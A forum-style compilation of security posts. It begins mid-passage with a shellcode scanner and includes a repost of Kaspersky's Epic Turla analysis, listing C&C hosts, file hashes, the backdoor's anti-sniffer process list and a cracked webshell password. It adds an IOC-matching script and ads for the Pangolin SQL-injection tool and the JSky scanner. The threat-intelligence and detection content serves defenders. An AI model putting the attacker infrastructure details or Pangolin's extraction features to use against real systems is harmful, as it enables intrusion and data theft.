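	}{{"call-pop", SampleCallPop}, {"fnstenv", SampleFnstenvPop}, {"jmp-call-pop", SampleJmpCallPop}, {"http", SampleBenign}}
	for _, s := range samples {
		fmt.Printf("%-13s %v\n", s.name, scanGetPC(s.data))
	}
}
```

Such a scanner is cheap enough to run on every payload Wireshark or a honeypot hands over, and its hits are the natural trigger for handing the buffer to libemu for full emulation; on its own it will also flag the occasional innocent binary that happens to contain one of these byte sequences, which is exactly the false-positive problem emulation is meant to resolve.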
-
Worth listening to. "Ennnumereitor"
-
The Epic Turla Operation Solving some of the mysteries of Snake/Uroburos By GReAT on August 7, 2014. Technical Appendix with IOCs Executive Summary Over the last 10 months, Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call "Epic Turla". The attackers behind Epic Turla have infected several hundred computers in more than 45 countries, including government institutions, embassies, military, education, research and pharmaceutical companies. The attacks are known to have used at least two zero-day exploits: CVE-2013-5065 - Privilege escalation vulnerability in Windows XP and Windows 2003 CVE-2013-3346 - Arbitrary code-execution vulnerability in Adobe Reader We also observed exploits against older (patched) vulnerabilities, social engineering techniques and watering hole strategies in these attacks. The primary backdoor used in the Epic attacks is also known as "WorldCupSec", "TadjMakhal", "Wipbot" or "Tavdig". When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to "rescue" each other if communications are lost with one of the backdoors. Once the attackers obtain the necessary credentials without the victim noticing, they deploy the rootkit and other extreme persistence mechanisms. The attacks are still ongoing as of July 2014, actively targeting users in Europe and the Middle East. Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services subscribers. 
Contact: intelreports@kaspersky.com

[h=2]The Epic Turla attacks[/h]

The attacks in this campaign fall into several different categories depending on the vector used in the initial compromise:
- Spearphishing e-mails with Adobe PDF exploits (CVE-2013-3346 + CVE-2013-5065)
- Social engineering to trick the user into running malware installers with ".SCR" extension, sometimes packed with RAR
- Watering hole attacks using Java exploits (CVE-2012-1723), Flash exploits (unknown) or Internet Explorer 6,7,8 exploits (unknown)
- Watering hole attacks that rely on social engineering to trick the user into running fake "Flash Player" malware installers

The attackers use both direct spearphishing and watering hole attacks to infect their victims. Watering holes (waterholes) are websites of interest to the victims that have been compromised by the attackers and injected to serve malicious code.

So far we haven't been able to locate any e-mail used against the victims, only the attachments. The PDF attachments do not show any "lure" to the victim when opened; however, the SCR packages sometimes show a clean PDF upon successful installation.

Some of the known attachment names used in the spearphishing attacks are:
- ???? ????.rar (translation from Arabic: "Geneva conference.rar")
- NATO position on Syria.scr
- Note_?107-41D.pdf
- Talking Points.scr
- border_security_protocol.rar
- Security protocol.scr
- Program.scr

In some cases, these filenames can provide clues about the type of victims the attackers are targeting.

[h=2]The watering hole attacks[/h]

Currently, the Epic attackers run a vast network of watering holes that target visitors with surgical precision. Some of the injected websites include:
- The website of the City Hall of Pinor, Spain
- A site promoting entrepreneurship in the border area of Romania
- Palestinian Authority Ministry of Foreign Affairs

In total, we observed more than 100 injected websites. Currently, the largest number of injected sites is in Romania.
Here's a statistic on the injected websites:

The distribution is obviously not random, and it reflects some of the interests of the attackers. For instance, in Romania many of the infected sites are in the Mures region, while many of the Spanish infected sites belong to local governments (City Hall).

Most of the infected sites use the TYPO3 CMS (see: TYPO3 - The Enterprise Open Source CMS), which could indicate the attackers are abusing a specific vulnerability in this publishing platform.

Injected websites load a remote JavaScript into the victim's browser:

The script "sitenavigatoin.js" is a Pinlady-style browser and plugin detection script, which in turn redirects to a PHP script sometimes called main.php or wreq.php. Sometimes, the attackers register the .JPG extension with the PHP handler on the server, using "JPG" files to run PHP scripts:

Profiling script

The main exploitation script "wreq.php", "main.php" or "main.jpg" performs a number of tasks. We have located several versions of this script which attempt various exploitation mechanisms.

One version of this script attempts to exploit Internet Explorer versions 6, 7 and 8:

Internet Explorer exploitation script

Unfortunately, the Internet Explorer exploits have not yet been retrieved.
Another more recent version attempts to exploit Oracle Sun Java and Adobe Flash Player:

Java and Flash Player exploitation scripts

Although the Flash Player exploits couldn't be retrieved, we did manage to obtain the Java exploits:

Name          MD5
allj.html     536eca0defc14eff0a38b64c74e03c79
allj.jar      f41077c4734ef27dec41c89223136cf8
allj64.html   15060a4b998d8e288589d31ccd230f86
allj64.jar    e481f5ea90d684e5986e70e6338539b4
lstj.jar      21cbc17b28126b88b954b3b123958b46
lstj.html     acae4a875cd160c015adfdea57bd62c4

The Java files exploit a popular vulnerability, CVE-2012-1723, in various configurations. The payload dropped by these Java exploits is the following:

MD5: d7ca9cf72753df7392bfeea834bcf992

The Java exploits use a special loader that attempts to inject the final Epic backdoor payload into explorer.exe. The backdoor extracted from the Java exploits has the following C&C hardcoded inside:

www.arshinmalalan[.]com/themes/v6/templates/css/in.php

This C&C is still online at the moment, although it redirects to a currently suspended page at "hxxp://busandcoachdirectory.com[.]au". For a full list of C&C servers, please see the Appendix.

The Epic Turla attackers are extremely dynamic in using exploits or different methods depending on what is available at the moment. Most recently, we observed them using yet another technique coupled with watering hole attacks.
This takes advantage of social engineering to trick the user into running a fake Flash Player (MD5: 030f5fdb78bfc1ce7b459d3cc2cf1877):

In at least one case, they tried to trick the user into downloading and running a fake Microsoft Security Essentials app (MD5: 89b0f1a3a667e5cd43f5670e12dba411):

The fake application is signed by a valid digital certificate from Sysprint AG:

Serial number: 00 c0 a3 9e 33 ec 8b ea 47 72 de 4b dc b7 49 bb 95
Thumbprint: 24 21 58 64 f1 28 97 2b 26 22 17 2d ee 62 82 46 07 99 ca 46

Valid signature from Sysprint AG on Epic dropper

This file was distributed from the Ministry of Foreign Affairs of Tajikistan's website, at "hxxp://mfa[.]tj/upload/security.php". The file is a .NET application that contains an encrypted resource. This drops the malicious file with the MD5 7731d42b043865559258464fe1c98513. This is an Epic backdoor which connects to the following C&Cs, with a generic internal ID of 1156fd22-3443-4344-c4ffff:

hxxp://homaxcompany[.]com/components/com_sitemap/
hxxp://www.hadilotfi[.]com/wp-content/themes/profile/

A full list with all the C&C server URLs that we recovered from the samples can be found in the technical Appendix.

[h=2]The Epic command-and-control infrastructure[/h]

The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality. The huge network commanded by the Epic Turla attackers serves multiple purposes. For instance, the motherships function as both exploitation sites and command and control panels for the malware. Here's what the big picture looks like:

Epic Turla lifecycle

The first level of command and control proxies generally talk to a second level of proxies, which in turn talk to the "mothership" server. The mothership server is generally a VPS, which runs the Control panel software used to interact with the victims. The attackers operate the mothership using a network of proxies and VPN servers for anonymity reasons.
The motherships also work as the exploitation servers used in the watering hole attacks, delivering Java, IE or fake applications to the victim.

We were able to get a copy of one of the motherships, which provided some insight into the operation. It runs a control panel which is password protected:

Epic mothership control panel login

Once logged into the Control panel, the attackers can see a general overview of the system including the number of interesting potential targets:

Epic control panel status overview

A very interesting file on the servers is task.css, where the attackers define the IP ranges they are interested in. To change the file, they are using the "Task editor" from the menu. Depending on the "tasks", they will decide whether to infect the visitors or not. In this case, we found they targeted two ranges belonging to:
- "Country A" - Federal Government Network
- "Country B" - Government Telecommunications and Informatics Services Network

It should be noted, though, that the fact that the attackers were targeting these ranges doesn't necessarily mean they also got infected. Some other unknown IPs were also observed in the targeting schedules.

There is also an "except.css" file where attackers log the reasons they didn't try to exploit certain visitors. There are three possible values:
- TRY
- DON'T TRY -> Version of the browser and OS does not meet the conditions
- DON'T TRY -> (2012-09-19 10:02:04) - checktime

These are the "don't meet the conditions" reasons observed in the logs:

Windows 7 or 2008 R2
MSIE 8.0
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E)
Adobe Shockwave 11.5.1.601
Adobe Flash 10.3.181.14
Adobe Reader 10.1.0.0
Win Media Player 12.0.7601.17514
Quick Time null
MS Word null
Java null

[h=2]The Epic / Tavdig / Wipbot backdoor[/h]

For this first stage of the attack, the threat actor uses a custom backdoor.
In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult. The CVE-2013-5065 exploit allows the backdoor to achieve administrator privileges on the system and run unrestricted. This exploit only works on unpatched Microsoft Windows XP systems.

Other known detection names for the backdoor are Trojan.Wipbot (Symantec) or Tavdig.

The main backdoor is about 60KB in size and implements a C&C protocol on top of normal HTTP requests. The communication protocol uses requests in the C&C replies, which the malware decrypts and processes. The replies are sent back to the C&C through the same channel. The malware behavior is defined by a configuration block. The configuration block usually contains two hard-coded C&C URLs. We have also seen one case where the configuration block contains just one URL. The configuration can also be updated on the fly by the attackers, via the C&C.

The backdoor attempts to identify the following processes and, if found, it will terminate itself:

tcpdump.exe
windump.exe
ethereal.exe
wireshark.exe
ettercap.exe
snoop.exe
dsniff.exe

It contains an internal unique ID, which is used to identify the victim to the C&C. Most samples, especially old ones, have the ID 1156fd22-3443-4344-c4ffff. Once a victim is confirmed as "interesting", the attackers upload another Epic backdoor which has a unique ID used to control this specific victim.

During the first C&C call, the backdoor sends a pack with the victim's system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware.

Through monitoring, we were able to capture a large amount of commands sent to the victims by the attackers, providing a unique view into this operation.
Here's a look at one of the encrypted server replies:

Once a victim is infected and "checks in" with the server, the attackers send a template of commands:

Next, the attackers try to move through the victim's network using pre-defined or collected passwords:

Listing all .doc files recursively is also a common "theme":

In total, we have decoded several hundreds of these command packages delivered to the victims, providing a unique insight into the inner workings of the attackers. In addition to generic searches, some very specific lookups have been observed as well. These include searches for:

*NATO*.msg
eu energy dialogue*.*
EU*.msg
Budapest*.msg

In this case, the attackers were interested to find e-mails related to "NATO", "Energy Dialogue within European Union" and so on.

For some of the C&C servers, the attackers implemented RSA encryption for the C&C logs, which makes it impossible to decrypt them. This scheme was implemented in April 2014.

[h=2]Lateral movement and upgrade to more sophisticated backdoors[/h]

Once a victim is compromised, the attackers upload several tools that are used for lateral movement. One such tool observed in the attacks and saved as "C:\Documents and Settings\All users\Start Menu\Programs\Startup\winsvclg.exe" is:

Name: winsvclg.exe
MD5: a3cbf6179d437909eb532b7319b3dafe
Compiled: Tue Oct 02 13:51:50 2012

This is a keylogger tool that creates %temp%\~DFD3O8.tmp. Note: the filename can change across victims. On one Central Asian government's Ministry of Foreign Affairs victim system, the filename used was "adobe32updt.exe".

In addition to these custom tools, we observed the usage of standard administration utilities.
For instance, another tool often uploaded by the attackers to the victim's machine is "winrs.exe":

Name: winrs.exe
MD5: 1369fee289fe7798a02cde100a5e91d8

This is a UPX-packed binary, which contains the genuine "dnsquery.exe" tool from Microsoft, unpacked MD5: c0c03b71684eb0545ef9182f5f9928ca.

In several cases, an interesting update has been observed: malware from a different, yet related, family.

Size: 275,968 bytes
MD5: e9580b6b13822090db018c320e80865f
Compiled: Thu Nov 08 11:05:35 2012

Another example:

Size: 218,112 bytes
MD5: 071d3b60ebec2095165b6879e41211f2
Compiled: Thu Nov 08 11:04:39 2012

This backdoor is more sophisticated and belongs to the next level of cyber-espionage tools, called the "Carbon system" or Cobra by the Turla attackers. Several plugins for the "Carbon system" are known to exist.

Decoded configuration for e9580b6b13822090db018c320e80865f

Note: the command and control servers www.losguayaberos[.]com and thebesttothbrushes[.]com have been sinkholed by Kaspersky Lab.

Other packages delivered to the victims include:

MD5: c7617251d523f3bc4189d53df1985ca9
MD5: 0f76ef2e6572befdc2ca1ca2ab15e5a1

These top level packages deploy both updated Epic backdoors and Turla Carbon system backdoors to confirmed victims, effectively linking the Epic and Turla Carbon operations together.
The Turla Carbon dropper from these packages has the following properties:

MD5: cb1b68d9971c2353c2d6a8119c49b51f

This is called internally by the authors "Carbon System", part of the "Cobra" project, as can be seen from the debug path inside:

This acts as a dropper for the following modules, both 32 and 64 bit:

MD5                               Resource number
4c1017de62ea4788c7c8058a8f825a2d  101
43e896ede6fe025ee90f7f27c6d376a4  102
e6d1dcc6c2601e592f2b03f35b06fa8f  104
554450c1ecb925693fedbb9e56702646  105
df230db9bddf200b24d8744ad84d80e8  161
91a5594343b47462ebd6266a9c40abbe  162
244505129d96be57134cb00f27d4359c  164
4ae7e6011b550372d2a73ab3b4d67096  165

The Carbon system is in essence an extensible platform, very similar to other attack platforms such as the Tilded platform or the Flame platform. The plugins for the Carbon system can be easily recognized as they always feature at least two exports named:

ModuleStart
ModuleStop

Carbon system plugin with characteristic exports

Several Epic backdoors appear to have been designed to work as Carbon system plugins as well; they require a specialized loader to start in victim systems that do not have the Carbon system deployed.

Some modules have artifacts which indicate the Carbon system is already at version 3.x, although the exact Carbon system version is very rarely seen in samples:

The author of the Carbon module above can also be seen in the code, as "gilg", who also authored several other Turla modules.

We are planning to cover the Turla Carbon system in more detail in a future report.
[h=2]Language artifacts[/h]

The payload recovered from one of the mothership servers (at newsforum.servehttp[.]com/wordpress/wp-includes/css/img/upload.php, MD5: 4dc22c1695d1f275c3b6e503a1b171f5, Compiled: Thu Sep 06 14:09:55 2012) contains two modules, a loader/injector and a backdoor. Internally, the backdoor is named "Zagruzchick.dll":

The word "Zagruzchick" means "boot loader" in Russian.

The Control panel for the Epic motherships also sets the language to codepage "1251":

Codepage 1251 is commonly used to render Cyrillic characters.

There are other indications that the attackers are not native English language speakers:

Password it´s wrong!
Count successful more MAX
File is not exists
File is exists for edit

The sample e9580b6b13822090db018c320e80865f, which was delivered to several Epic victims as an upgraded backdoor, has the compilation code page language set to "LANG_RUSSIAN".

The threat actor behind the "Epic" operation uses mainly hacked servers to host their proxies. The hacked servers are controlled through the use of a PHP webshell. This shell is password protected; the password is checked against an MD5 hash:

The MD5 "af3e8be26c63c4dd066935629cf9bac8" has been solved by Kaspersky Lab as the password "kenpachi".

In February 2014 we observed the Miniduke threat actor using the same backdoor on their hacked servers, although using a much stronger password. Once again, it is also interesting to point out the usage of Codepage 1251 in the webshell, which is used to render Cyrillic characters. There appear to be several links between Turla and Miniduke, but we will leave that for a future blogpost.

[h=2]Victim statistics[/h]

On some of the C&C servers used in the Epic attacks, we were able to identify detailed victim statistics, which were saved for debugging purposes by the attackers.
This is the country distribution for the top 20 affected countries by victim's IP:

According to the public information available for the victims' IPs, targets of "Epic" belong to the following categories:
- Government
  - Ministry of interior (EU country)
  - Ministry of trade and commerce (EU country)
  - Ministry of foreign/external affairs (Asian country, EU country)
  - Intelligence (Middle East, EU Country)
- Embassies
- Military (EU country)
- Education
- Research (Middle East)
- Pharmaceutical companies
- Unknown (impossible to determine based on IP/existing data)

[h=2]Summary[/h]

When G-Data published their Turla paper, there were few details publicly available on how victims get infected with this malware campaign. Our analysis indicates this is a sophisticated multi-stage infection, which begins with Epic Turla. This is used to gain a foothold and validate the high profile victim. If the victim is interesting, they get upgraded to the Turla Carbon system.

Most recently, we observed this attack against a Kaspersky Lab user on August 5, 2014, indicating the operation remains fresh and ongoing.

Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services customers.
Contact: intelreports@kaspersky.com

We would like to add the following at the end of the blogpost, right before the detection names:

[h=2]Further reading[/h]

If you'd like to read more about Turla/Uroburos, here are a few recommendations:
- G-Data's paper "Uroburos Highly complex espionage software with Russian roots"
- BAE Systems analysis of "The Snake campaign"
- "Uroburos: the snake rootkit", technical analysis by deresz and tecamac
- "TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos" by CIRCL.LU

Kaspersky products' detection names for all the malware samples described in this post:

Backdoor.Win32.Turla.an
Backdoor.Win32.Turla.ao
Exploit.JS.CVE-2013-2729.a
Exploit.JS.Pdfka.gkx
Exploit.Java.CVE-2012-1723.eh
Exploit.Java.CVE-2012-1723.ou
Exploit.Java.CVE-2012-1723.ov
Exploit.Java.CVE-2012-1723.ow
Exploit.Java.CVE-2012-4681.at
Exploit.Java.CVE-2012-4681.au
Exploit.MSExcel.CVE-2009-3129.u
HEUR:Exploit.Java.CVE-2012-1723.gen
HEUR:Exploit.Java.CVE-2012-4681.gen
HEUR:Exploit.Java.Generic
HEUR:Exploit.Script.Generic
HEUR:Trojan.Script.Generic
HEUR:Trojan.Win32.Epiccosplay.gen
HEUR:Trojan.Win32.Generic
HackTool.Win32.Agent.vhs
HackTool.Win64.Agent.b
Rootkit.Win32.Turla.d
Trojan-Dropper.Win32.Dapato.dwua
Trojan-Dropper.Win32.Demp.rib
Trojan-Dropper.Win32.Injector.jtxs
Trojan-Dropper.Win32.Injector.jtxt
Trojan-Dropper.Win32.Injector.jznj
Trojan-Dropper.Win32.Injector.jznk
Trojan-Dropper.Win32.Injector.khqw
Trojan-Dropper.Win32.Injector.kkkc
Trojan-Dropper.Win32.Turla.b
Trojan-Dropper.Win32.Turla.d
Trojan.HTML.Epiccosplay.a
Trojan.Win32.Agent.iber
Trojan.Win32.Agent.ibgm
Trojan.Win32.Agentb.adzu
Trojan.Win32.Inject.iujx
Trojan.Win32.Nus.g
Trojan.Win32.Nus.h

Technical Appendix with IOCs

Source: The Epic Turla Operation - Securelist
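The report above lists file hashes, C&C hosts and the distribution URL of the fake installer, which is the raw material for a retrospective sweep. The following Python is an added example, not Kaspersky's code and not part of the reposted article: it collects the MD5s and hosts quoted in the report and matches them against a host inventory (path to MD5, as produced by a hashing sweep) and a proxy log. The inventory entries and log lines are constructed here, and the log line format is an assumption, not a real product's. The unpacked dnsquery.exe hash is deliberately left out because the report identifies it as the genuine Microsoft tool.

```python
"""Epic Turla indicator matching (added example; constructed sample data)."""
import hashlib
from urllib.parse import urlsplit

# MD5s quoted in the report. The unpacked dnsquery.exe hash
# (c0c03b71684eb0545ef9182f5f9928ca) is left out on purpose: the report
# says it is the genuine Microsoft tool, so it would only cause false positives.
EPIC_MD5S = {
    "536eca0defc14eff0a38b64c74e03c79",  # allj.html (Java exploit page)
    "f41077c4734ef27dec41c89223136cf8",  # allj.jar
    "15060a4b998d8e288589d31ccd230f86",  # allj64.html
    "e481f5ea90d684e5986e70e6338539b4",  # allj64.jar
    "21cbc17b28126b88b954b3b123958b46",  # lstj.jar
    "acae4a875cd160c015adfdea57bd62c4",  # lstj.html
    "d7ca9cf72753df7392bfeea834bcf992",  # payload dropped by the Java exploits
    "030f5fdb78bfc1ce7b459d3cc2cf1877",  # fake Flash Player installer
    "89b0f1a3a667e5cd43f5670e12dba411",  # fake Microsoft Security Essentials
    "7731d42b043865559258464fe1c98513",  # Epic backdoor dropped by the above
    "a3cbf6179d437909eb532b7319b3dafe",  # winsvclg.exe keylogger
    "1369fee289fe7798a02cde100a5e91d8",  # winrs.exe (UPX-packed dnsquery.exe)
    "e9580b6b13822090db018c320e80865f",  # Carbon system backdoor
    "071d3b60ebec2095165b6879e41211f2",  # Carbon system backdoor
    "c7617251d523f3bc4189d53df1985ca9",  # top-level package
    "0f76ef2e6572befdc2ca1ca2ab15e5a1",  # top-level package
    "cb1b68d9971c2353c2d6a8119c49b51f",  # Carbon dropper
    "4c1017de62ea4788c7c8058a8f825a2d",  # Carbon modules (resources 101-165)
    "43e896ede6fe025ee90f7f27c6d376a4",
    "e6d1dcc6c2601e592f2b03f35b06fa8f",
    "554450c1ecb925693fedbb9e56702646",
    "df230db9bddf200b24d8744ad84d80e8",
    "91a5594343b47462ebd6266a9c40abbe",
    "244505129d96be57134cb00f27d4359c",
    "4ae7e6011b550372d2a73ab3b4d67096",
    "4dc22c1695d1f275c3b6e503a1b171f5",  # mothership payload (upload.php)
}

# C&C and distribution hosts quoted in the report, kept defanged as printed.
EPIC_HOSTS_DEFANGED = [
    "www.arshinmalalan[.]com",
    "homaxcompany[.]com",
    "www.hadilotfi[.]com",
    "mfa[.]tj",
    "newsforum.servehttp[.]com",
    "www.losguayaberos[.]com",   # sinkholed by Kaspersky Lab
    "thebesttothbrushes[.]com",  # sinkholed by Kaspersky Lab
]


def normalize_host(host: str) -> str:
    """Lower-case, drop a trailing dot and a leading 'www.' so that
    'www.X.com' and 'X.com' compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


EPIC_HOSTS = {normalize_host(h.replace("[.]", ".")) for h in EPIC_HOSTS_DEFANGED}


def host_is_indicator(host: str) -> bool:
    """Exact-host or subdomain match. Substring matching is avoided so an
    unrelated host such as 'notmfa.tj' does not trigger on 'mfa.tj'."""
    host = normalize_host(host)
    return any(host == h or host.endswith("." + h) for h in EPIC_HOSTS)


def proxy_hits(log_text: str) -> list:
    """Scan lines of the constructed form
    '<timestamp> <client-ip> <method> <url> <status>' and return
    (client, host, path) for every request to an indicator host."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # blank or malformed line
        client, url = parts[1], parts[3]
        u = urlsplit(url)
        if u.hostname and host_is_indicator(u.hostname):
            hits.append((client, u.hostname, u.path))
    return hits


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def inventory_hits(inventory: dict) -> list:
    """inventory maps file path -> MD5 hex; returns paths whose hash is
    one of the report's indicators."""
    return sorted(p for p, h in inventory.items() if h.lower() in EPIC_MD5S)


# Constructed sample data: one benign request, two C&C contacts, one lookalike.
SAMPLE_PROXY_LOG = """\
2014-08-07T10:01:02 10.0.0.12 GET http://www.example.org/index.html 200
2014-08-07T10:01:09 10.0.0.12 GET http://www.arshinmalalan.com/themes/v6/templates/css/in.php 200
2014-08-07T10:02:31 10.0.0.25 GET http://mfa.tj/upload/security.php 200
2014-08-07T10:03:00 10.0.0.31 GET http://notmfa.tj/upload/security.php 200
"""

SAMPLE_INVENTORY = {
    r"C:\Documents and Settings\All users\Start Menu\Programs\Startup\winsvclg.exe":
        "a3cbf6179d437909eb532b7319b3dafe",
    r"C:\Windows\notepad.exe": md5_hex(b"constructed benign file content"),
}

if __name__ == "__main__":
    for hit in proxy_hits(SAMPLE_PROXY_LOG):
        print("C&C contact:", hit)
    for path in inventory_hits(SAMPLE_INVENTORY):
        print("Known Epic/Carbon hash:", path)
```

Hash matching only catches the exact samples named in the report; the same backdoor with a refreshed configuration block gets a new MD5, so in practice the host matches (and the sinkholed domains, which should never appear in a clean proxy log) are the more durable signal.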
-
pangolin

Pangolin is a penetration testing, SQL Injection test tool for database security. It finds SQL Injection vulnerabilities. Its goal is to detect and inform you of SQL injection vulnerabilities in web applications. Once it detects an SQL injection on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire or user-specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Documentation
- Pangolin White Paper
- Pangolin Data Sheet
- Pangolin User Guide

Video Demonstration
- Inject SQL Server
- Inject MySQL
- More Demos Here

ScreenShot

Pangolin FAQ: Click Here

Database support: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, Sybase.

Pangolin is recommended by many Web security experts all over the world.
- OWASP: http://www.owasp.org/index.php/SQL_Injection#References
- Red Database Security: 1. Oracle Security Videos 2. http://blog.red-database-security.com/2009/03/05/web-application-testing-with-pangolin-video-screenshot/print/
- SECURITY DATABASE: http://www.security-database.com/toolswatch/Focus-on-Pangolin-SQL-Injection.html

Features
Here are some of the features:
- HTTPS support
- Pre-Login Proxy
- Specify any HTTP headers (User-agent, Cookie, Referer and so on)
- Bypass firewall setting
- Auto-analyzing keyword
- Detailed check options
- Injection-points management

15 Days Full Function (No Limitation) Trial

Source: pangolin « NOSEC – Serving More People
-
jsky

What is JSky?
JSky is a web vulnerability scanner and web application vulnerability assessment tool.

Documentation
- JSky White Paper
- JSky Data Sheet
- JSky Quick Start
- JSky User Guide

ScreenShot

Video Demonstration
- Quick Scan Your Website With NOSEC JSky

What can JSky do?
JSky is a Web Application Security Vulnerability scanner that can scan for the following Web Application Security Vulnerabilities:
* SQL Injection
* Cross-Site Scripting
* Insecure Indexing
* Local path disclosure
* Server Misconfiguration
* And all web application threats.

And JSky is not only a scanner, but also an assessment tool.

Why should I use JSky?
Look at these features and benefits; we think you will love it right away:
1. Powerful web spider and multi-threaded scanner crawls hundreds of thousands of pages with ease, and also supports extracting links from JavaScript and Flash.
2. Advanced and in-depth SQL injection testing from our Pangolin software, which precisely locates security vulnerabilities. Our software uses proprietary methods that go beyond pattern matching. This is what enables us to be so precise in locating security vulnerabilities.
3. JSky provides both an XML based vulnerability file, and an integrated security vulnerability executive parser. This makes it easy to design a vulnerability test. All you need to do is edit the XML file; no further compatibility coding required.
4. Easy to use. We have worked hard to create a product that does not require advanced internet security knowledge.

The value of JSky
JSky can inspect all aspects of your Web application, looking for vulnerabilities in your website. Using advanced artificial hacking intelligence, JSky probes your site's defenses to find the areas that require further attention. JSky lets you see what a hacker would see if he were attacking your site. This knowledge allows you to fix the vulnerability.
A few examples of people that will benefit from JSky include:
* Penetration tester
* Website administrator
* And so much more……

Security on the web is of the utmost importance. Without Web application testing, credit card transactions can be easily compromised. Thus, for credit card processing, PCI DSS compliance is enforced. Consultants using JSky provide web security services to help you meet PCI DSS.

System Requirements
* 1 GB of memory
* 2 GB of free disk space
* 1.5 GHz Processor or better
* Windows 2000/Windows XP/Windows 2003/Windows Vista/Windows7

Keywords: information security, security on web, web application testing, web applications security, web vulnerability scanner, security assessment, PCI DSS, web security service, vulnerability assessments.

15 Days Full Function (No Limitation) Trial

Source: jsky « NOSEC – Serving More People
-
[h=1]PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery[/h]

August 7th, 2014, 11:55 GMT · By Silviu Stahie

PCLinuxOS 2014.07, a free Linux distribution aimed at desktop computers and laptops and relying on KDE, has been released with numerous package updates.

PCLinuxOS comes with many flavors, but the default is actually KDE. The developers also make a few other versions, like KDE MiniMe, LXDE, or FullMonty, but this is the main one downloaded by most users. The distribution actually follows a rolling release model, which means that new major features and other changes are introduced regularly through the update channel. Every month, the download ISOs are regenerated with the new update, but if you already have the operating system installed you only have to update it regularly.

“The KDE MiniMe iso provides a basic KDE desktop and is intended for advanced users who know how to fine-tune their system. To keep this iso small no printer drivers are included. The KDE Full Version ISO provides a standard KDE desktop with many popular applications and out-of-the-box driver support for generic desktop computing,” reads the official announcement.

According to the changelog, the Linux kernel now used in the distribution is 3.15.4, which is one of the most recent. It's not exactly top-of-the line, but it's new enough that users won't have any problems with newer hardware. PCLinuxOS is still using KDE 4.12.3, which is a rather old version. The developers of this distro have been using this desktop for quite some time, but an upgrade should arrive pretty soon.

Also, Nvidia and ATI fglrx driver support is available, multimedia playback support for many popular formats has been added, the LibreOffice Manager can install LibreOffice supporting over 100 languages, and MyLiveCD allows users to take a snapshot of the installation.
The developers have also explained that “in case of low or missing speaker volume users need to click the speaker-icon at the bottom right of the panel, then on ‘Mixer’, and raise the volume sliders.”

The system requirements for this interesting OS are quite low, if you want to give it a try. Users will need a modern Intel or AMD processor (preferably for 32-bit), 1 GB or more RAM memory (recommended 4 GB+), 10 GB or more HDD space, and NVIDIA, ATI HD 4000, or better graphics card to enjoy the 3D desktop and all the effects.

More details about this Linux distribution can be found in the official changelog. You can download PCLinuxOS 2014.07 right now from Softpedia. A new version of the more complete PCLinuxOS FullMonty should also arrive pretty soon.

Source: PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery
-
[h=1]Blackhat 2014[/h] Built binaries for BH2014 Digging for Sandbox Escapes workshop. Link: https://github.com/tyranid/bh2014
-
Indeed Engineering Blog » Blog Archive Bug Bounty Program: Cash Rewards for Reported Vulnerabilities » Indeed Engineering Blog
-
Car Hacking Enters Remote Exploitation Phase
by Michael Mimoso

LAS VEGAS – Charlie Miller and Chris Valasek have proven to be adept backseat drivers. Noted for their car-hacking exploits, Miller and Valasek have gained fame at hacking conferences and on Fox News for forcing automobiles to do their bidding. However, until today’s talk at the Black Hat 2014 conference, the two researchers’ exploits required them to be plugged in directly to their targets, literally sitting in the back seat of an automobile injecting code into its computers.

No more. Miller and Valasek delivered a brisk talk explaining the soft spots in automobile networks that open a car up to remote exploit. They also provided a quick overview of specific car makers’ and models’ exploitability and demonstrated their version of an intrusion detection system that blocks some of their remote exploits.

“We looked for a big attack surface,” said Miller, a security engineer at Twitter.

Remote car attacks don’t look much different than attacks against conventional networks, Miller said. Attackers need a vulnerability in a wireless communication protocol, such as Bluetooth, and then take that over in order to have the ability to pass messages to different functions of the car, such as steering or braking. The researchers said that many car manufacturers segment their autos’ internal networks, forcing communication through a centralized bus that would require a hacker to go through two hops in order to force the car to brake hard or take over steering, for example. Some vehicles, such as the Cadillac Escalade 2015, have a radio module that sits on a low- and high-speed bus, they said, enabling a hacker to send messages to both ends if they’re able to get in.

“Car hacking is hard,” Miller said. “There’s lots of complexity, and the more technology you introduce, the more problems you have.”

Further complicating the scenario is the difficulty in patching automobile software.
Valasek said there are significant costs to the manufacturer, not only in producing the patch, but also in contacting customers who then must take their vehicles to a dealer for a software update.

“It’s going to be really hard when an exploit comes out and everyone has a vulnerability that needs to be fixed,” said Valasek, director of vehicle security research at IOActive.

Once an attacker finds a vulnerability that allows him to send messages over Bluetooth, for example, it’s helpful if the vehicle has a lot of what the researchers call cyber-physical features to exploit. Some of those include self-parking, active lane control, pre-collision systems and adaptive cruise control. All of those require some communication between a sensor and the brakes, acceleration or steering, usually over Bluetooth or some other radio signal.

